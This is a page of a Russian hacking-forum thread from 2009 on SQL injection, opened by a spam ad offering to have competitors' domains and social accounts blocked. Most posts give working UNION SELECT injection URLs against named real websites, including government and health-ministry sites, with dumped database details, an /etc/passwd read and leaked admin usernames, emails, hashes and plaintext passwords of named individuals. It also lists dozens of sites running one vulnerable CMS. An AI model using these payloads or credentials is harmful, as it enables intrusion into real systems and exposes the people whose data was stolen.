УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 890 из 1242

890

Опции темы

Поиск в этой теме

Опции просмотра

#8891

17.04.2009, 02:12

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

http://sex-izvrat.com/index.php?cat_url=-16'+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user())/*

5.0.45:sexiz:morrr@localhost

#8892

17.04.2009, 09:19

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<Greenroofs.com Projects>>

Код:

http://www.greenroofs.com/projects/pview.php?id=-29+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+

4.0.27-standard::::db207579874::::dbo207579874@localhost: ::

c-linux-gnu

#8893

17.04.2009, 10:42

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Еврейская информационная служба

Код:

http://www.jewnet.ru/newslines/?profile_id=-14)+union+select+1,2,3,concat(table_name,0x3a,table_rows,0x3a,table_schema),5,6+from+information_schema.tables+limit+17,100--+&action=search

Радиевый институт им. В.Г.Хлопина

Код:

http://www.khlopin.ru/view_event?id=-15+union+select+1,2,3,4,5,table_name,7,8,9,0+from+information_schema.tables+limit+17,1--

#8894

17.04.2009, 13:40

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

GOV

Цитата:

https://postdocportal.dep.anl.gov/SPT--TopicMessages.php?topicid=10+union+select+1,2,3,4, version(),6,7/*&forumid=2

Version: 5.0.45
User: apache@localhost
Dbname: PostdocPortalSPT

File_priv=Y

#8895

17.04.2009, 14:00

hitt 1g

Новичок

Регистрация: 14.04.2009

Сообщений: 6

Провел на форуме:
71588

Репутация: 44

Цитата:

http://www.sabpa.org/web/news_details.php?ID=-1+union+select+1,concat_ws(0x3a,first_name,passwor d,email,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+from+tbl_reg+limit+2,1--

DB Version: 5.0.51a-log
DB Name: sabpaorg_main
DB User: sabpaorg_main@boscgi0104.eigbox.net

PR: 5

Admin data: Yuerong:ronzhu:ron@sabpa.org

Цитата:

http://www.thehockeyacademy.com/index.php?pageid=666+union+select+concat_ws(0x3a,u ser,password,file_priv),2,3,4,5+from+mysql.user--

DB Version: 5.0.32-Debian_7etch5-log
DB Name: thalive
DB User: root@localhost

MySQL Admin data: root:*93557E6B71D093D803CBAC890F5A2A0877DA8729

PR: 4

Цитата:

http://www.stt.fi/bw/article.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8--

DB Version: 4.1.12
DB Name: wirereleases
DB User: mile@194.100.184.209

PR: 6

Цитата:

http://www.furtherfield.org/displayreview.php?review_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password,email,admin),10,11,12+from+Users+lim it+3,1--

DB Version: 5.0.27-log
DB Name: test
DB User: atty@localhost

Admin data: ruth catlow:382a9bb65e35773a:ruth.catlow@furtherfield.o rg

PR: 5

Цитата:

http://www.mg-rover.org/xpower/showart.php?ArtID=-1+union+select+1,2,concat_ws(0x3a,UserName,UserPas sword,UserEmail),4,5,6,7,8+from+mgrusers+limit+0,1--

DB Version: 5.0.67-community
DB Name: massn2_mnpo
DB User: massn2_Brook3@localhost

Admin data:
Steve Childs:almond:steve@mg-rover.org
Dr Dave:jgfftsvd:drdave@mg-rover.org

PR: 4

#8896

17.04.2009, 15:25

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<< Casual Life - жизнь в стиле casual >>

Код:

http://www.casualife.ru/index.php?act=article&id=-415+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,0,1,2--+

4.1.22-log:::casuali4_debug:::casuali4_casuali@localhost: :

ortbld-freebsd6.1

table: users
column:?
----------------------------------
----------------------------------
<<Фан клуб группа "Звери">>

Код:

http://www.33hochu.ru/fanclub_gallery_view.php?id_club=3987+union+select+1,column_name,3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115)/*

5.0.32-Debian_7etch8-log:::33h:::33h@localhost:::

c-linux-gnu

table: users
db: passtest
kiss34:c8b2f17833a4c73bb20f88876219ddcd
------------------------------------
------------------------------------
<<Николаевский Бозаръ>>

Код:

http://old.bazar.nikolaev.ua/print.php?id=-356+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5--+

4.1.22-log:::bazar_old:::bazar_old@apollo::

ortbld-freebsd6.2

webylon cms v 2.5 (sql)

#8897

17.04.2009, 16:32

fker

Участник форума

Регистрация: 26.11.2008

Сообщений: 158

Провел на форуме:
2816163

Репутация: 158

webylon cms v 2.5 (sql)

Уязвимы скрипты:
bigimg.cgi
Сайт фирмы разработчака cms(pr3):

Код:

http://www.webylon.ru/bigimg.cgi?id=-65+union+select+version(),2,3--

Комп сервис(pr4):

Код:

http://www.pcs.ru/bigimg.cgi?id=-1+union+select+version(),2,2--

Государственный комитет РК по энергетике и регулированию тарифов(pr4)

Код:

http://rekrk.ru/bigimg.cgi?id=-1+union+select+version(),2,2--

Министерство здравоохранения респ карелия:

Код:

http://mzsocial-rk.ru/bigimg.cgi?id=-1+union+select+version(),2,2--

и так далее, ок десятка сайтов...
place.cgi

Код:

http://nordfoto.ru/cgi/place.cgi?id=999+union+select+1,2,version()--

bigimg_galery.cgi(вывод смотреть в исходнике страницы)
Ассоциация защиты информации(pr4):

Код:

http://www.azi.ru/bigimg_galery.cgi?id=9999+union+select+version(),2,3,9--

и т.д. около 60 сайтов.

Вот такие шаблонные сайты предлогает фирма Mediaweb купить от 3к рублей =(
зы: интересная табличка SITE_ADMINS, и админка сама должна быть интересная ; ) с возможностью правки скриптов, как сообщяет саппорт, но ее я не нашел(сообщите плз есль кто найдет)
The end.

#8898

17.04.2009, 20:04

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

http://liveoaks.lsu.edu/info/details.php?zone=fr&id=-24'+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12+from+mysql.user/*

root::5edf35344cf0a863

http://www.euroexpress.org/recent_developments.php?section_id=-2'+union+select+1,2,3,concat_ws(0x3a3a,user_login, user_passwd),5,6,7,8,9,10,11,12,13+from+users/*
cmradmin::ÿ"›-ï}cc

#8899

17.04.2009, 20:53

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<Управленчиский портал "Managerial.ru">>

Код:

http://managerial.ru/news.php?id=102+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6--+

4.0.27-max-log:::julia417:::julia417@v43.valuehost.ru:::unkno wn-freebsd4.7
-=admin=-
login: admin
pass: 9827Q59h

-=users=-
Привалова Юлия Витальевна:3uKcZJS
Simplesitetester igor k:BqFdd6z
Simple vacancy maker:QywV9rc
Диденко Юлия Викторовна:KNDMP0R?
Шелегов Константин Анатольевич:caxE6rP
Усова Юлия Владимировна:9YhBCJs
Никонорова Елена Михайловна:sq4dssF
------------------------------------------
------------------------------------------

Код:

http://www.detfond.org/news.php?id=-2008080803'+union+select+1,2,3,concat(version(),0x3a3a,database(),0x3a3a,user(),0x33aa,@@version_compile_os),5,6,7,8,9--+

5.0.27::detfond::detfond@localhost3?redhat-linux-gnu

Код:

http://www.detfond.org/admin/

information_schema - It is closed

Последний раз редактировалось farex; 17.04.2009 в 21:05..

#8900

17.04.2009, 21:22

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

ПР4

Код:

http://www.thaihomemaster.com/webboard-readtopic.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11

thaihomema_root@localhost:thaihomema_home:5.0.41-community-log

PR3

Код:

http://www.carolverret.net/viral/readtopic.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8

carol@localhost:carol:5.0.77
Давненько меня тут небыло.

Код:

http://www.saurusreptiles.com/readtopic.php?category=Crested%20Gecko&tablename=crestedgecko_2&oldtablename=crestedgecko&code=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5

saurusreptiles@68.178.254.234:saurusreptiles:4.1.2 2-max-log

Код:

http://www.nicodepaola.it/topicRead.php?topic=5&id_topic=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6

user@plesk-unix4.tol.it:NDP_DB:5.0.68

Последний раз редактировалось mailbrush; 17.04.2009 в 22:05..

Страница 890 из 1242

890

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход